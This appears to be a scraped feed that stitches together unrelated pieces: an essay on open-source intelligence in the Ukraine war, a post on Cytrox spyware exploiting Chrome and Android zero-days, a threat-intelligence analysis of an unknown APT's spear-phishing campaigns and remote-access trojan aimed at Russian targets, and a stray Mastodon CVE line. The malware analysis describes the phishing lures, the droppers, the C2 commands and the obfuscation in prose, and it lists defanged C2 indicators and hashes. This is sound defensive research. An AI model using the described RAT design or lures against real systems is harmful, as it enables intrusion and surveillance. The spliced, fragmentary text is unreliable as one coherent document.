One consequence of widely available open source information is that anonymity is eroding, not only for ordinary civilians, but also for members of law enforcement, military, and the intelligence community. Even missing information can alert an adversarial spy service, says a former US intelligence official who spoke on background. When the US State Department unfolded a public diplomacy strategy in 2008 that emphasized the use of social media, a foreign counterpart joked to the former US intelligence official that CIA officers, working under nonofficial cover at US embassies, were easily deduced because they lacked Facebook profiles. The US government has a gargantuan effort underway to address similar issues brought on by an absence or expectation of digital exhaust associated with intelligence officers’ cover identities.

When it comes to modern intelligence collection, closed societies like North Korea, Russia, and Iran have an advantage against open ones. Both secrecy and transparency—or the control of information, whether by individuals or governments—are integral to the freedom and security of those individuals and societies. Closed societies can collect an open one’s information with ease, all the while preventing access to similar information from domestic political opponents or hostile foreign actors.

But too much secrecy on the part of governments and militaries—including those of Russia’s Vladimir Putin—can also prevent them from knowing themselves, which may contribute to strategic blunders. Information technology, by its nature, disintegrates boundaries. It erodes barriers to markets across sectors and societies: from journalism to intelligence, crime to terrorism—and now it seems, with Russia’s invasion of Ukraine, conventional war.

Intelligence isn’t just information, says Jeff Rogg, a historian of US intelligence whose work focuses on civil-intelligence relations. The objective of intelligence, compared to just information, is obtaining or maintaining an advantage over one’s adversaries—whether that intelligence is secret or open source. This principle is at play when the Biden administration declassifies intelligence in an unprecedented manner in order to counter Russian misinformation or shares secret intelligence with Ukrainian counterparts.

“Given the emphasis placed on open sources in the war in Ukraine, it’s easy to forget how successful intelligence outcomes can also depend on secrecy, and even a bit of deception. Attributing successes in Ukraine to open sources can also offer a cover of sorts for more closely held sources and methods,” says Rogg.

British scholar Matthew Ford, coauthor of an upcoming book on the impact information infrastructure and connected devices have on conventional military conflicts, calls the phenomenon “radical war.”

Ford says that the high level of mobile connectivity among Ukrainians and a notable absence of combat footage from smartphones and headcams, especially in the early phases of the war, suggest an effective information operation may be underway. “No doubt the Ukrainians fear such images will reveal their tactics, techniques, and procedures,” says Ford. So Ukrainians may simply be censoring themselves.

Social media platforms and cell phones are also a force multiplier for traditionally weaker military powers, like Ukraine, especially when it comes to coordinating intelligence collection for targeting activities. “Targeting information is now being exchanged online,” Ford says. “Successful kills have been celebrated on Telegram. Chatbots have been established, helping Ukrainians share target coordinates with their smartphones. Identifying targets doesn’t involve complex military systems; it works from civilian information infrastructures.”

“The problem with crowdsourced intelligence in a war like Ukraine is standardizing the reporting,” Ford says. For example: “You want to be able to identify the vehicle, geo-locate it, then map against any available signals or satellite imagery, or other collection disciplines, fusing it into actionable target information.”

The Russian invasion of Ukraine is not only the 21st century’s first conventional war in Europe, it is the “most digitally connected in history,” according to Ford. “If the Ukrainians can make that intelligence actionable quicker than the Russians, they can use their limited remote fires, artillery, drones, and maybe even missiles or air power effectively. The objective, therefore, is to find, fix, and finish Russian forces more quickly than the Russians can do this themselves.”

When Russia launched its full-scale invasion in late February, the US, its allies, and Russia concluded that Ukraine’s forces were asymmetrically disadvantaged against Putin’s endowed and historically brutal counterpart. US officials expected the country to fall in days. Yet despite the US’s monumental success predicting Russia’s intentions and plans and offering warnings, American intelligence agencies incorrectly assessed Ukraine’s prospects—the current subject of an internal review.

Facing the full onslaught of Russia's armed forces, Ukraine’s military resilience may even have come as a bit of a surprise to Ukrainians themselves, Ford suspects. Yet mistaken judgments about the expected balance between strong and weak powers, accompanied by strategic surprise, may be a common occurrence in the information age. Before the acknowledged role of social media in fueling the Arab Spring, or the reported significance of thumb drives in more recent counterintelligence failures—telecommunications, open source infrastructure, and cheap and accessible consumer technology have impacted the parity calculus for state and non-state actors alike.

Indeed, it was the worldwide growth of telecommunications in the 1990s that empowered Al-Qaeda to conduct its successful covert military attacks on US soil on September 11, 2001. But in the run-up to those attacks, the US Department of Defense hadn’t drafted a net assessment on the military or intelligence capabilities of what was later described by the 9/11 Commission as America’s “most dangerous foreign enemy.” The concept was unimaginable then, but it shouldn’t be now.

Similarly, the intelligence community had not authored a national estimate that comprehensively evaluated or articulated the strategic threat posed by Al-Qaeda before its 2001 attack. This category of cognitive bias is called the “paradox of expertise.” Genuine experts may communicate incredible nuance and understanding of a subject but overlook indicators of seismic changes within the domains of their knowledge.

It’s also possible to make analytical errors by overstating or inflating the impact or outcomes of technology and information on civil society—or any domain—including conventional war. The internet, which promised us a techno-utopian commune of open source information, has arguably turned large swaths of civil society into psychedelic hellscapes, much like the Charles Manson murders after the Summer of Love.

Civilian noncombatants’ use of open source platforms and consumer devices in support of hostile military actions raise serious questions about blurred lines between civilian and combatant—lawful or otherwise—leading to the same subjects becoming legitimate targets or tried for espionage under the laws of war. Civilians are legally protected under international humanitarian law, as long as they are not party to military conflicts.

According to recent reports, US intelligence support led to the successful targeting of Russian generals and the _Moskva_, Russia’s flagship in the Black Sea. “One of the intelligence concerns people have voiced is that these leaks unnecessarily raise the risks of escalation,” Rogg says. “But consider the Javelins, Stingers, and military hardware we are publicly providing. The US and its allies are fighting an overt—as compared to covert—proxy war against Russia. That’s one of the key distinctions in this conflict from, for example, US support to the mujahideen in Afghanistan in the 1980s, which is one of the popular comparisons you read about today: The US is taking a risk by abandoning some of the hallmarks of intelligence and advantages of covert action, like plausible deniability. That being said, there is still plenty that we do not know. Putting aside all the reporting, leaks, and official disclosures, the exact role and impact of US intelligence in Ukraine will be a source of study and debate for years to come.”

Open Source Intelligence May Be Changing Old-School War

A spyware vendor called Cytrox was found to be using several zero-day vulnerabilities in Google's Chrome browser and the Android kernel component. 
The post Zero-day vulnerabilities in Chrome and Android exploited by commercial spyware appeared first on Malwarebytes Labs.

The Google Threat Analysis Group (TAG) has revealed that of the nine zero-day vulnerabilities affecting Chrome, Android, Apple and Microsoft that it reported in 2021, five were in use by a single commercial surveillance company.

Did I hear someone say Pegasus? An educated guess, but wrong in this case. The name of the surveillance company—or better said, professional spyware vendor—is Cytrox and the name of its spyware is Predator.

**Google**

TAG routinely hunts for zero-day vulnerabilities exploited in-the-wild to fix the vulnerabilities in Google’s own products. If the group finds zero-days outside of its own products, it reports them to the vendors that own the vulnerable software.

Patches for the five vulnerabilities TAG mentions in its blog are available. Four of them affected the Chrome browser and one the Android kernel component.

**Vulnerabilities**

By definition, zero-day vulnerabilities are vulnerabilities for which no patch exists, and therefore potentially have a high rate of success for an attacker. That doesn’t mean that patched vulnerabilities are useless to attackers, but they will have a smaller number of potential targets. Depending on the product and how easy it is to apply patches, vulnerabilities can be useful for quite a while.

In the campaign uncovered by TAG, the spyware vendor used the zero-days in conjunction with other already-patched vulnerabilities. The developers took advantage of the time difference between the availability of patches for some of the critical bugs, as it can take a while before these patches are fully deployed across the Android ecosystem.

TAG says Cytrox abused four Chrome zero-days (CVE-2021-37973, CVE-2021-37976, CVE-2021-38000, and CVE-2021-38003) and a single Android zero-day (CVE-2021-1048) last year in at least three campaigns conducted on behalf of various governments.

**Cytrox**

TAG is actively tracking more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to government-backed actors. Cytrox is one of these vendors, along with the NSO Group—undoubtedly the best known one among them and responsible for Pegasus spyware.

Citizenlab at the University of Toronto published information about Cytrox in December 2021. It says that Cytrox describes its own activities as providing governments with an “operational cyber solution” that includes gathering information from devices and cloud services. It also says it assists with “designing, managing, and implementing cyber intelligence gathering in the network, enabling businesses to gather intelligence from both end devices as well as from cloud services.”

Cytrox reportedly began life as a North Macedonian start-up and appears to have a corporate presence in Israel and Hungary. As such, Cytrox is believed to be part of the so-called Intellexa alliance, a marketing label for a range of mercenary surveillance vendors that emerged in 2019. The consortium of companies includes Nexa Technologies (formerly Amesys), WiSpear/Passitora Ltd., Cytrox, and Senpai, along with other unnamed entities, purportedly seeking to compete against other players in the cyber surveillance market such as NSO Group (Pegasus) and Verint.

**Government spyware**

Spyware packages such as Predator and Pegasus create problematic circumstances for the security teams at Google, Apple, and Microsoft, and it seems like they will not stop any time soon.

Whatever arguments these vendors use about how they are working for governments, and therefore not doing anything illegal, we all know the legitimacy of some governments lies in the eye of the beholder. And it is not always easy to find out who actually controls the data received from the spyware.

It is for good reason that the European Data Protection Supervisor (EDPS) has urged the EU to ban the development and deployment of spyware with the capabilities of Pegasus to protect fundamental rights and freedoms. The EDPS argues that the use of Pegasus might lead to an unprecedented level of intrusiveness, threatening the very essence of the right to privacy, since the spyware is capable of interfering with the most intimate aspects of our daily lives.

Zero-day vulnerabilities in Chrome and Android exploited by commercial spyware

An in-depth look at the attack chain used by an unknown APT group that has launched four campaigns against Russian targets since February.
The post Unknown APT group has targeted Russia repeatedly since Ukraine invasion appeared first on Malwarebytes Labs.

An unknown Advanced Persistent Threat (APT) group has targeted Russian government entities with at least four separate spear phishing campaigns since late February, 2022.

The campaigns, discovered by the Malwarebytes Threat Intelligence team, are designed to implant a Remote Access Trojan (RAT) that can be used to surveil the computers it infects, and run commands on them remotely. The malware uses a number of advanced tricks to hide what it does and how it works, but our analysts have been able to reverse engineer the malware, reveal its inner workings, and uncover some clues about its possible origins.

Attribution is always difficult, and there is no shortage of countries or agencies with an interest in getting covert access to Russian government computers—and the recent invasion of Ukraine has simply increased the stakes. Although our analysis and attribution efforts are ongoing, we have discovered some indicators that suggest the threat actor may be a Chinese group.

**The campaigns**

The APT group has launched at least four campaigns since late February, using a variety of lures, detailed below.

**1\. Interactive map of Ukraine**

The threat actor started this campaign around February 26, 2022, and distributed its custom malware with the name interactive_map_UA.exe, trying to disguise it as an interactive map of Ukraine. This campaign began a few days after Russia invaded Ukraine, which shows the threat actor was monitoring the situation between Ukraine and Russia and took advantage of it to lure targets in Russia.

**2\. Log4j patch**

In this campaign the threat actor packaged its custom malware in a tar file called Patch_Log4j.tar.gz, a fake fix for December’s high-profile Log4j vulnerability.

This campaign ran in early March and was primarily aimed at RT TV (formerly Russia Today or Rossiya Segodnya, a Russian state-controlled international television network funded by the Russian government). The APT group had access to almost 100 RT TV employees’ email address.

The emails were sent with the subject “Ростех. ФСБ РФ. Роскомнадзор. Срочные сиправления уязвимостей”, which translates into “Rostec. FSB RF. Roskomnadzor. Urgent Vulnerability Fixes”. (Rostec is a Russian state-owned defense conglomerate founded by Putin.)

The emails also come with a number of image files and a PDF attached, perhaps to make the email less suspicious, and to bypass any systems that flag emails by number of attachments.

A spear phishing email from an unknown APT group claims to have “urgent vulnerability fixes”

The PDF attachment—О кибербезопасности 3.1.2022.pdf—pretends to be from the “Ministry of Digital Development, Telecommunications and Mass Communications of the Russian Federation”. It contains instructions about how to execute the fake patch, as well as a bulleted list of security advice such as “Use two-factor authentication”, “Issue separate credit cards for purchases”, and “Use Kaspersky antivirus”.

A PDF attachment tries to build trust with security advice and instructions on how to run the fake Log4j patch

In a confident demonstration of just how little attention people pay to such lists it ends “Do not open or reply to suspicious emails.”

The list even includes a link to a page on VirusTotal that proclaims in bright green letters that “No security vendors and no sandboxes flagged this file as malicious”. This is just another effort to convince the victims that the attachment is not malicious—the file on VirusTotal has nothing to do with the attachment and appears to be a legitimate OpenVPN file.

The PDF attachment links to a VirusTotal entry for an unrelated file

In another effort to build trust, the spear phishing email links to the website rostec.digital, a domain registered by the threat actor, hosting a site made look like the official Rostec website.

This email also contains links to fake Instagram and Facebook accounts. Interestingly, the threat actor created the Facebook page in June 2021, nine months before it was used in this campaign. This was probably an attempt to attract followers, to make the page look more legitimate, and it suggests the APT group were planning this campaign long before the invasion of Ukraine.

The rostec.digital website  

The rostec.digital facebook account

The rostec.digital Instagram account

**3\. Build Rostec**

The Rostec defense conglomerate also appears in the third campaign. This time the threat actor used the file name build_rosteh4.exe for its malware—an apparent attempt to make it look like software from Rostec.

**4\. Saudi Aramco job**

The most recent campaign occured in mid April and used a Word document containing a fake job advert for a “Strategy and Growth Analyst” position at Saudi Aramco as a lure.

(We also discovered a self-extracting archive file that belonged to this campaign—the archive file used a Jitsi video conferencing software icon as decoy, and created a directory named Aramco under C:\ProgramData.)

Although the job advert is written in English, it also contains a message in Russian, asking users to enable macros.

A malicious job advert urges Russian readers to enable macros

The document uses remote template injection to download a macro-embedded template, which executes a macro that drops a VBS script called HelpCenterUpdater.vbs in the %USER%\Documents\AdobeHelpCenter directory.

The template also seems to do a redundant check for the existence of %USER%\Documents\D5yrqBxW.txt and only if it doesn’t exist, will it drop the script and execute it.

Macros embedded in the remote template

The obfuscated HelpCenterUpdater.vbs script drops another obfuscated VBS file named UpdateRunner.vbs and downloads the main payload—a DLL named GE40BRmRLP.dll—from its command and control (C2) server. (Interestingly, some anti-analysis code, and code responsible for persistence, seems to be commented out in UpdateRunner.vbs and isn’t executed.)

In another payload related to this campaign, the script seems to drop an EXE instead of a DLL, but after analyzing both it seems they share the same code.

Deobfuscated HelpCenterUpdater.vbs

The job of the UpdateRunner.vbs script is to execute the DLL through rundll32.exe.

Deobfuscated UpdateRunner.vbs

The malicious DLL contains the code that communicates with the C2 server and executes the commands it receives from it.

The attack chain for the Saudi Aramco-themed APT campaign

The malware, which is common to all four campaigns, is explained in detail in the next section.

**Payload analysis**

This analysis focuses on the GE40BRmRLP.dll payload from the Saudi Aramco campaign, but the malware used in all four campaigns is essentially the same, with small differences in the code.

The DLL is heavily obfuscated and most of the library functions are statically linked. IDA is barely able to recognize any functions, though it was able to recognize a few that indicate the DLL was most likely compiled with LLVM. The DLL’s original name is supposed to be simpleloader.dll, as we can see after analyzing it a bit.

The DLLMain function from GE40BRmRLP.dll

Before we dive into the functionality and capabilities of this malware, let’s look at various methods it uses to make the analysis difficult for us.

**Anti-analysis techniques****Control Flow Flattening**

All of the samples used in these campaigns use control flow flattening heavily, a technique that flattens the nested structure of a program, making analysis very difficult. We used the D810 plugin for IDA which has the capability to deobfuscate flattened code and make the decompilation more readable.

Although there are many tools that can perform control flow flattening, in this case we suspect OLLVM—an obfuscator for LLVM—was used. The different samples had different levels of flattening and OLLVM allows users to specify this. Additionally we also saw what looks like the Bogus Control Flow LLVM pass being used.

Control Flow Flattening used by the malware

**String obfuscation**

The payload’s strings are obfuscated with simple XOR encoding. The decode_string function which is used to decode a string takes 3 arguments: The encoded string, the destination of the decoded string, and the byte that is used while decoding the string.

Each string is decoded every time it’s required by the malware.

The decode_string function from GE40BRmRLP.dll

**Command and control**

Before contacting its C2 server the malware derives an ID which is unique to every machine, which could be used to differentiate infections. It uses the data from the following APIs to construct the ID:

*   GetFileAttributesA on the C:\Windows directory
*   GetComputerNameA
*   GetVolumeInformationA on the C:\ drive

It then calculates a hash of this data using the Blake2b-256 algorithm and sends it when it makes the first contact with its C2.

Deriving the ID

The C2 address is decoded every time the malware sends a request. To communicate with the C2 the malware uses GET requests in the form url/?wSR=_data_, where _data_ contains the encoded information.

Interestingly Any.run and Fiddler fail to capture the HTTPS requests made by the malware. To make them, the malware doesn’t use any library functions but instead implements everything over raw sockets, and it uses the WolfSSL library to implement SSL itself. Our analysis also uncovered traces of http-parser from ZephyrOS. The certificate used for the SSL communication is stored inside the binary as chunks of encoded strings. Initially the malware decodes this data and stores it. Later, while making the HTTPS request, it loads this data using WolfSSL’s loadX509orX509REQFromBuffer.

After making every request the malware sleeps for a random amount of time.

HTTPS GET request

Based on the response to the above request, the malware decides which of command to execute:

1.  **getcomputername**. This retrieves the computer name using GetComputerNameA and sends a response to the C2 containing the unique id and the computer name.
2.  **upload**. This receives a file name and file contents from the C2 which it writes to the local file system.
3.  **execute**. This receives a command line instruction from the C2 and executes it using CreateProcessA. If the command is successful then the malware sends the UID with the “OK” string to the C2, or the output of GetLastError if it fails.
4.  **exit**. This is used to terminate the malware process.
5.  **ls**. This command uses a directory name from the C2, or the name of the current directory if one isn’t provided. It uses the FindFirstFile and FindNextFile function to retrieve a list of all the files under the directory and sends it back to the C2.

The upload command

The List Files command

**Attribution**

Attribution is difficult, and threat actors are known to use indicators from other groups as false flags. The attribution of the APT behind these campaigns is ongoing, but based on the infrastructure used we assess with low confidence that this group is a Chinese actor.

All of the C2s are from BL Networks, which has been used by Chinese APTs in the past. Also, we discovered infrastructure overlap between the malware we analyzed and the Sakula Rat malware used by the Deep Panda APT.

Infrastructure overlap between Sakula RAT and the malware analzed in this article

Another interesting indicator we found was that the macro used in the Aramco campaign is almost identical to some macros used by TrickBot and BazarLoader in the past. We think the actor may have used the same macro builder to generate its macro, and they may have used it as a false flag. There are some other weak indicators, such as WolfSSL, which has been used by Lazarus and Tropic Troopers, but they are not enough to help attribute the attack to any specific actor.

Malwarebytes customers were proactively protected against these campaigns thanks to our heuristic detection engines.

**IOCs****C2 Domains**

windowsipdate\[.\]com  
microsoftupdetes\[.\]com  
mirror-exchange\[.\]com

**C2 IPs**

168.100.11.142  
192.153.57.83  
45.61.137.211  
206.188.197.35

**Download Domain**

fatobara\[.\]com

**Download IP**

91.210.104.54

****Hashes****

Name

Hash

Final payload

cbde42990e53f5af37e6f6a9fd14714333b45498978a7971610acb640ddd5541  
86ecd536c84cec6fc07c4cb3db63faa84f966a95763d855c7f6d7207d672911e  
917820338751b08cefc635090fc23b4556fa77b9007a8f5d72c11e0453bfec95  
22bdc42a86d3c70a01c51f20f5b7cfb353319691a8102f0fe3ea02af9079653e  
12c20f9dbdb8955f3f88e28dc10241f35659dbcd74dadc9a10ca1b508722d69a  
3f16055dc0f79f34f7644cae21dfe92ffc80f2c3839340a7beebd9436da5d0eb  
f5658588c36871421f287f12e7e9ba5afba783a7003da1043a9c52d10354b909  
ca95e8a8b6fb11b5129821f034b337b06cdf407fa9516619f3baed450ac1cf2d  
bac1790efe7618c5b2b9e34e6e1d36ec51592869bcc5fb304dd7554c32731093  
5d039f4368f88a2299be91303c03143e340f700f1fc8aa0a8cdbfbc5a193c6be

patch\_Log4j.tar.gz

4b622d63e6886b1430f6ca9cba519cbefde60cd8b6dbcade7c3a152c3930e7c7

PDF attachment

f4db6fa3a83052152b5d16dc6a4e9749afafc026612ff5c3ad735743736ac488

Emails

0625566ec55f0a083d1c1a548a2631502f17e455066b29731e29d372918e6541 0925b3c05cef6d3476a97b7d4975e9e3ceefedf62f42663b9c02070e587b3f2d 111fef44ba63f11279572f1e7e4d6ce5613ef8fe3b76808355cdcbed47b49fec 1c886a9138f3b0e0b18f1c0da83719a9b5351db7ce24baa13c0e56ef65d96d02 1fb0cd76ec5ae70f08a87f9e81cb5e9b07f9b3306772ae723fa63ff5abfa0d07 27d19efedb6a7c8d3c65fe06fd5be9c3e236600e797e5058705db1e2335ec2ad 310fa9c65aa182a59e001e8f61c079e27d73b8eb5f8f8965509cb781d97ba811 3627b37b341efa0b36352d76480dce994f481e672ebf9fa2da114a1339cf6c01 3655420f72d0c14cfb113ccb53e9ac85b87883913c3844b3e0bfb7bd7230a9bd 3b2ef76ec2eb3b4db4b7efe14d88c5338f1dc4eb9a9cf309989362d193c25403 3e9254d8cb25b2abf4fb755feaaf41c0059c68067e64de01a9242e5d9e47ab33 3ff96e73aeb0419df67bc5fec786a4dc82e4a9051274b4fc3cbc3ae3af7fdf94 44118322165be32de86569972e9f599a3c79a2336ca6f76c29861b40905cd067 4b6b0c29ece1c4719ec4d5186fb6247603fa1f03bd473bf6ef6367995e8c1121 4f28db1131ace2fce96e84172e0a861eb471ea054799e1132eb4945e4dca550b 4f8c2079ac98a3e8e085be8e88ff7b53ea70cb131cba4bfd2784e391d24c27e9 5a662050df51863575700a8e21efe605f4e789404d4bb53b4299f32b93e8d20f 5aa0a15e052fea2a2d445940ef751ddf3d3ae7c43c095a738b9bd603efc7df8b 5b9c7fe8ee5756dbd8563b3efe8dbc0966ad9044ff223b8797940f9e4e47333e 5ccf98699b96c811f4dab768cf486dc0f31b098dba30e031ba4ab2a5a5a3aba8 7ee7b2193b1e53f93dc2ed573d8f927cfa0916ccf111ff35faef9c4b153456f2 80a3de79f6c859d6c4667f705588c7c254d24fca2f44704123a2ba38e7c285a9 810d6566d9879c10a6a8581bb6ea6bed83a14a869383ad7e1ee16eadfd5bbb54 811827026414bdd400257cd3f048a1c75a2b211d02ac790510b800baa0702de4 81f24d1c310214b8f66345f250a6d5493e5e1cdf06d39d18a96cd9f93a1e7655 ac328efa54b6dd4497ba5dc6195474b8b9e5a7bcd32d5733e5006be9bbd0dc22 b63ef28fc1b0b1180fe9f476fe2ef3970b9928b009354e996bb2bf4ece223031 b99580152dde60622c1a962cd7cee1834d0ee86490785ac02d8ee51b73be008f c9623e83d875d6b9ca1a80087151b59a4037159c605ee92c6c795252ccf89596 cd277299ed849de71e88f698c1c06b0cfa65f166b0e90fc620aa50f6efe70161 d4062c6fd3813299ac721309fe0385a5337cea8b8e3605b05458467aeb23d8c0 e19b7dfe0e693c468c73f0a9e4c751216787daeff7d933cedcc10c932bd2835e e444303f1888b1ee5eeb69a0c4c3372b0cd2276b6987b0b18ea2267ff7ba19ad f15d90da5e253aaf570d29ffb9bf87ce7d8292b953d13e5a0f86b8671a4c57e7 fa800e6e16444894455b2a8f9e245efbe8b298fc8af9d7f8e155bb313ca9e7bb fc4af16fed48bd3a029ce8bfc4158712f9ab0cd8b82ca48cb701923d0a792015

Unknown APT group has targeted Russia repeatedly since Ukraine invasion

app/models/user.rb in Mastodon before 3.5.0 allows a bypass of e-mail restrictions.

Tag

#mac